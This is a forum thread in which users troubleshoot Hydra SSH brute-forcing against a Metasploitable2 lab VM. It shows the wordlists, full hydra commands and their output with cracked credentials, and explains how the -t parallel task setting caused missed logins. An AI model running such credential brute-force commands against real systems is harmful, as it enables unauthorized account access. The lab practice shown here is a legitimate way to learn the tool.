Jump to content

Hydra, false positive while bruteforce SSH


pierre
 Share

Recommended Posts

Hello,

I work with Hydra on metasploitable2.

I have metasploitable credentials account in two files, "user" and "pass".

I just want to know account have SSH right configured, so I bruteforce.

Three account have SSH access on the target:

root@osboxes:~# ssh sys@192.168.0.2
sys@192.168.0.2's password:
sys@metasploitable:~$ exit
logout

root@osboxes:~# ssh msfadmin@192.168.0.2
msfadmin@192.168.0.2's password:
msfadmin@metasploitable:~$ exit
logout

root@osboxes:~# ssh service@192.168.0.2
service@192.168.0.2's password:
service@metasploitable:~$ exit
logout

Now I want to bruteforce with Hydra:

root@osboxes:~# more user
sys
klog
msfadmin
service

root@osboxes:~# more pass
service
msfadmin
123456789
batman

And here is my Hydra command and the result:

root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.2   login: service   password: service
[22][ssh] host: 192.168.0.2   login: msfadmin   password: msfadmin
[22][ssh] host: 192.168.0.2   login: klog   password: 123456789
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42

Hydra is well recovering the password but not the right account.. It omits the account "sys:batman", do you know why ?

Link to comment
Share on other sites

I listen to the prompt and change my command:

root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22
[DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.2   login: klog   password: 123456789
[22][ssh] host: 192.168.0.2   login: msfadmin   password: msfadmin
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active
[22][ssh] host: 192.168.0.2   login: service   password: service
[22][ssh] host: 192.168.0.2   login: sys   password: batman
[STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26

This time all credentials were well-found !!

Adding the options -t 4 to my command :)

      -t TASKS
              run TASKS number of connects in parallel (default: 16)

It has something to do with the parallel tasks in the processor ?

I've made some tests :

A –t 6 makes the same good result within 1m24s.

A –t 8 makes the same good result within 57s.

A –t 10 makes the same good result within 50s.

A –t 11 makes a wrong result within 54s omitting 2/4 credentials.

 

And at -t 11 I got the warning:

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task

There is something scientific behind all this i'm sure !

 

Edited by tot94
Link to comment
Share on other sites

I can assure you, the processor doesn't give a shit. Maybe the program (Hydra) is shit at multitasking but, well, who knows?

I find these 2 lines quite descriptive. Somehow changing the command line added 264 new login attempts to the run. I'm wondering if you really didn't change anything else...

[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task

[DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task

Link to comment
Share on other sites

Non even for -t 16 I have :

[DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task

But I got these shitty lines:

The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.

So I think 6-8 are the right number of thread to execute Hydra.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...